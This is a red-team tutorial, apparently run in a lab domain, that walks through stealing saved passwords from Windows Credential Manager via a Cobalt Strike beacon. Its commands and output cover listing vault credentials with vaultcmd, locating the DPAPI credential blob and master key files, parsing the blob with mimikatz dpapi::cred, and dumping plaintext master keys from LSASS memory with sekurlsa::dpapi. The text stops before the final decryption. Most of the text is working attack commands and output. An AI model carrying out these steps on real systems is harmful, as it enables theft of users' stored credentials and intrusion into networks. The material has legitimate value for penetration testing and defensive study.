Extracting password from Windows/Web Credentials Manager

Credential Manager is the “digital locker” where Windows stores log-in credentials like usernames, passwords, and addresses. This information can be saved by Windows for use on your local computer.

View credentials

To view credentials saved into the 'Credentials Manager' via command line:

beacon> shell vaultcmd /listcreds:"Windows Credentials" /all
[*] Tasked beacon to run: vaultcmd /listcreds:"Windows Credentials"
[+] host called home, sent: 72 bytes
[+] received output:
Credentials in vault: Windows Credentials

Credential schema: Windows Domain Password Credential
Resource: Domain:target=HOST2
Identity: ryan
Hidden: No
Roaming: No
Property (schema element id,value): (100,3)

The saved credentials are saved as a blob in C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Credentials\\

beacon> ls C:\\Users\\john\\AppData\\Local\\Microsoft\\Credentials
[*] Tasked beacon to list files in C:\\Users\\john\\AppData\\Local\\Microsoft\\Credentials
[+] host called home, sent: 67 bytes
[*] Listing: C:\\Users\\john\\AppData\\Local\\Microsoft\\Credentials\\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 11kb     fil     03/26/2021 09:22:54   DFBE70A7E5CC19A398EBF1B96859CE5D

View Masterkey identifier

We can view what key the blob was encrypted to by using the mimikatz dpapi module

beacon> mimikatz dpapi::cred /in:C:\\Users\\john\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D
[*] Tasked beacon to run mimikatz's dpapi::cred /in:C:\\Users\\john\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D command
[+] host called home, sent: 750701 bytes
[+] received output:
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {746fa65b-3590-4ef5-9c24-ef479ccec600}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000030 - 48
  szDescription      : Local Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 6b7740e19fcddce737f8679062fa4668
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         : 
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 03b93d00fb1e51d56cdaccf8642c7992
  dwDataLen          : 00002c18 - 11288
  pbData             : c4c7aaf55e053637c[SNIPED]
  dwSignLen          : 00000014 - 20
  pbSign             : a311ceab145131ccfa02525009649f4a2e7fc743

In the above output we mostly care from the:

guidMasterKey - the identifier for the master key which was the blob encrypted with
pbData - the encrypted blob

The master key information is saved in C:\\Users\\<user>\\AppData\\Roaming\\Microsoft\\Protect\\<user sid>

beacon> ls C:\\Users\\john\\AppData\\Roaming\\Microsoft\\Protect\\
[*] Tasked beacon to list files in C:\\Users\\john\\AppData\\Roaming\\Microsoft\\Protect\\
[+] host called home, sent: 65 bytes
[*] Listing: C:\\Users\\john\\AppData\\Roaming\\Microsoft\\Protect\\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     03/26/2021 09:22:53   S-1-5-21-2669240679-2768610461-1282890330-1106
 24b      fil     03/26/2021 09:22:54   CREDHIST

beacon> ls C:\\Users\\john\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2669240679-2768610461-1282890330-1106
[*] Tasked beacon to list files in C:\\Users\\john\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2669240679-2768610461-1282890330-1106
[+] host called home, sent: 112 bytes
[*] Listing: C:\\Users\\john\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2669240679-2768610461-1282890330-1106\\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 740b     fil     03/26/2021 09:22:54   746fa65b-3590-4ef5-9c24-ef479ccec600
 884b     fil     03/26/2021 09:22:54   BK-EH
 24b      fil     03/26/2021 09:22:54   Preferred

Get MasterKey

We would need to find the masterkey sha1 from memory or by asking the DC for it

Find masterkey from cache

We can extract the DPAPI master keys from LSASS memory by running the following mimikatz commandsekurlsa::dpapi

beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 750721 bytes
[+] received output:

Authentication Id : 0 ; 6998111 (00000000:006ac85f)
Session           : Interactive from 4
User Name         : Administrator
Domain            : EH
Logon Server      : EHLAB-DC
Logon Time        : 3/26/2021 11:29:02 AM
SID               : S-1-5-21-2669240679-2768610461-1282890330-500

Authentication Id : 0 ; 5176335 (00000000:004efc0f)
Session           : RemoteInteractive from 4
User Name         : john
Domain            : EH
Logon Server      : EHLAB-DC
Logon Time        : 3/26/2021 9:22:46 AM
SID               : S-1-5-21-2669240679-2768610461-1282890330-1106
	 [00000000]
	 * GUID      :	{746fa65b-3590-4ef5-9c24-ef479ccec600}
	 * Time      :	3/26/2021 11:26:54 AM
	 * MasterKey :	598246dbdc92bf08f075e13c30e6c1f68990e78fa869be10d9cb0e1c8f0947db79279eae0a76d153d77877abb44d1258bdc30997a37c55f63aa5a3cfe4ef1101
	 * sha1(key) :	ab4e69c82cf98682805505384f1683bf475d9f10

In the above command we will search for the guidMasterKey we identified in the 'View Masterkey identifier' area earlier.